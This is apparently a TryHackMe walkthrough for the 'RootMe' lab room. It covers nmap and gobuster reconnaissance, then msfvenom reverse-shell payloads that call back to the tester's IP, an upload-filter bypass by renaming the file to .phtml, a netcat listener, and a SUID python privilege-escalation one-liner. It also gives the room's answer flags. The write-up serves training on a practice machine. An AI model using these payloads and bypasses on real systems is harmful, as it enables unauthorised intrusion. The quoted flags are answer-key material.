Skip to content

TryHackMe Writeups

Rrootme

TryHackMe Writeups

Home
Crackthehash
Cyberadventtemplate
Template
25daysofchristmas
25daysofchristmas
- 25daysofchristmas
Adv3nt0fdbopsjcap
Adv3nt0fdbopsjcap
- Adv3nt0fdbopsjcap
Adventofcyber2
Adventofcyber2
- Adventofcyber2
Adventofcyber2023
Adventofcyber2023
- Adventofcyber2023
Adventofcyber2024
Adventofcyber2024
- Adventofcyber2024
Adventofcyber23sidequest
Adventofcyber23sidequest
- Adventofcyber23sidequest
Agentsudoctf
Agentsudoctf
- Agentsudoctf
Anonymous
Anonymous
- Anonymous
Auditingandmonitoringse
Auditingandmonitoringse
- Auditingandmonitoringse
Authenticationbypass
Authenticationbypass
- Authenticationbypass
Blaster
Blaster
- Blaster
Blue
Blue
- Blue
Bof1
Bof1
- Bof1
Breachingad
Breachingad
- Breachingad
Breakrsa
Breakrsa
- Breakrsa
Burpsuitebasics
Burpsuitebasics
- Burpsuitebasics
Burpsuiteintruder
Burpsuiteintruder
- Burpsuiteintruder
Burpsuiteom
Burpsuiteom
- Burpsuiteom
Burpsuiterepeater
Burpsuiterepeater
- Burpsuiterepeater
Codeanalysis
Codeanalysis
- Codeanalysis
Commonlinuxprivesc
Commonlinuxprivesc
- Commonlinuxprivesc
Contentdiscovery
Contentdiscovery
- Contentdiscovery
Cowboyhacker
Cowboyhacker
- Cowboyhacker
Crackthehash
Crackthehash
- Crackthehash
Cryptographyintro
Cryptographyintro
- Cryptographyintro
Cybergovernanceregulation
Cybergovernanceregulation
- Cybergovernanceregulation
Dastzap
Dastzap
- Dastzap
Dataxexfilt
Dataxexfilt
- Dataxexfilt
Easyctf
Easyctf
- Easyctf
Encryptioncrypto101
Encryptioncrypto101
- Encryptioncrypto101
Enumerationpe
Enumerationpe
- Enumerationpe
Fileinc
Fileinc
- Fileinc
Hydra
Hydra
- Hydra
Ice
Ice
- Ice
Intronetworksecurity
Intronetworksecurity
- Intronetworksecurity
Johntheripper0
Johntheripper0
- Johntheripper0
Kenobi
Kenobi
- Kenobi
Linprivesc
Linprivesc
- Linprivesc
Linuxfundamentalspart1
Linuxfundamentalspart1
- Linuxfundamentalspart1
Linuxfundamentalspart2
Linuxfundamentalspart2
- Linuxfundamentalspart2
Linuxfundamentalspart3
Linuxfundamentalspart3
- Linuxfundamentalspart3
Linuxprivesc
Linuxprivesc
- Linuxprivesc
Linuxsystemhardening
Linuxsystemhardening
- Linuxsystemhardening
Malmalintroductory
Malmalintroductory
- Malmalintroductory
Metasploitexploitation
Metasploitexploitation
- Metasploitexploitation
Meterpreter
Meterpreter
- Meterpreter
Netsecchallenge
Netsecchallenge
- Netsecchallenge
Ohsint
Ohsint
- Ohsint
Operatingsystemsecurity
Operatingsystemsecurity
- Operatingsystemsecurity
Owaspjuiceshop
Owaspjuiceshop
- Owaspjuiceshop
Owasptop102021
Owasptop102021
- Owasptop102021
Passwordattacks
Passwordattacks
- Passwordattacks
Picklerick
Picklerick
- Picklerick
Postexploit
Postexploit
- Postexploit
Powershell
Powershell
- Powershell
Printerhacking101
Printerhacking101
- Printerhacking101
Redteamrecon
Redteamrecon
- Redteamrecon
Rpnessusredux
Rpnessusredux
- Rpnessusredux
Rrootme
Rrootme
- Rrootme Rrootme
  Table of contents
  - Table of contents
    
    Reconnaissance
    
    Getting a shell
    
    Privilege escalation
Sast
Sast
- Sast
Seriskmanagement
Seriskmanagement
- Seriskmanagement
Shodan
Shodan
- Shodan
Sql injection
Sql injection
- Sql injection
Steelmountain
Steelmountain
- Steelmountain
Thelayoftheland
Thelayoftheland
- Thelayoftheland
Threatmodelling
Threatmodelling
- Threatmodelling
Traverse
Traverse
- Traverse
Uploadvulns
Uploadvulns
- Uploadvulns
Vulnerabilitycapstone
Vulnerabilitycapstone
- Vulnerabilitycapstone
Vulnerabilitymanagementkj
Vulnerabilitymanagementkj
- Vulnerabilitymanagementkj
Vulnversity
Vulnversity
- Vulnversity
Walkinganapplication
Walkinganapplication
- Walkinganapplication
Weaponization
Weaponization
- Weaponization
Winadbasics
Winadbasics
- Winadbasics
Windows10privesc
Windows10privesc
- Windows10privesc
Windowsfundamentals1
Windowsfundamentals1
- Windowsfundamentals
Windowsfundamentals2
Windowsfundamentals2
- Windowsfundamentals2
Windowsfundamentals3
Windowsfundamentals3
- Windowsfundamentals3
Windowslocalpersistence
Windowslocalpersistence
- Windowslocalpersistence
Windowsprivesc20
Windowsprivesc20
- Windowsprivesc20
Wiresharkpacketoperations
Wiresharkpacketoperations
- Wiresharkpacketoperations
Wiresharkthebasics
Wiresharkthebasics
- Wiresharkthebasics
Wonderland
Wonderland
- Wonderland

RootMe Banner

RootMe Logo

RootMe

This guide contains the answer and steps necessary to get to them for the RootMe room.

Table of contents

Reconnaissance
Getting a shell
Privilege escalation

Reconnaissance

Scan the machine, how many ports are open?

We use nmap for this with:

nmap -sV -sS 10.10.77.33 -p-

Recon Nmap

Click for answer
2

What version of Apache is running?

The Apache version can be seen from the scan. Otherwise add the -sV argument.

Click for answer
2.4.29

What service is running on port 22?

This can also be found from the scan when using -sV.

Click for answer
ssh

Find directories on the web server using the GoBuster tool.
What is the hidden directory?

Finding hidden directories, can be done with the following command:

gobuster dir -u 10.10.77.33:80 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Recon Directory

One of these is not a standard folder for a webserver.

Click for answer
/panel/

Getting a shell

user.txt

The first to do is create a reverse shell payload. My first attempt was to use msfvenom to create a linux reverse tcp shell and output it as an .elf file.

msfvenom -p  linux/x64/meterpreter/reverse_tcp LHOST=10.10.82.70 LPORT=1337 -f elf -o letmein.elf

Shell Payload

This can now be uploaded to the webserver.

Shell Upload

Unfortunately, I did not get a connection as the files was simply downloaded. We need to try a different format. Php is another usefull format for a reverse shell.

msfvenom -p php/reverse_php LHOST=10.10.82.70 LPORT=1337 -f raw > letmein.php

Shell Payload Php

Shell Upload Php Fail

The server doesn't let us upload a .php file. This might be bypassed by renaming the file extension. Simply renaming to .jpg.php did not work in this case, but .phtml did.

mv letmein.php letmein.phtml

Shell Upload Php Rename

Shell Upload Php Success

Now that it is uploaded we start our listener again and click on the file we uploaded in the /uploads/ directory.

nc -nlvp 1337

Shell Directory

Although the shell is connecting to our machine, it never seems to be fully established. So another method is in order. A pre-made php reverse shell can be obtained from 'pentestmonkey' on github.

Shell Php Script

We only need to add our own IP and port to listen on.

Shell Php Script Edit

Save this file with the phtml extension en upload to the server. Setup the listener on port 1337 and execute the file from the /uploads page.

Shell Connection

Success!

Now we can search for the file user.txt and open it to get our flag.

find / -name user.txt 2>/dev/null

Shell Flag

Click for answer
THM{y0u_g0t_a_sh3ll}

Privilege escalation

Search for files with SUID permission, which file is weird?

Using: find / -perm -4000 2>/dev/null we can search for any binaries with their SUID bit set.

Priv SUID

Click for answer
/usr/bin/python

Find a form to escalate your privileges.
root.txt

After we identify the outlier, we can go to the GTFO bins website to find out how we can abuse this specific binary.

Priv Gtfo

We need to add the path to the python binary on this machine to the command. Then we can simply run it in our shell.

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Priv Escalation

We got root access!

Now lets search for the root flag.

find /root -name root.txt 2>/dev/null

Priv Root Flag

Click for answer
THM{pr1v1l3g3_3sc4l4t10n}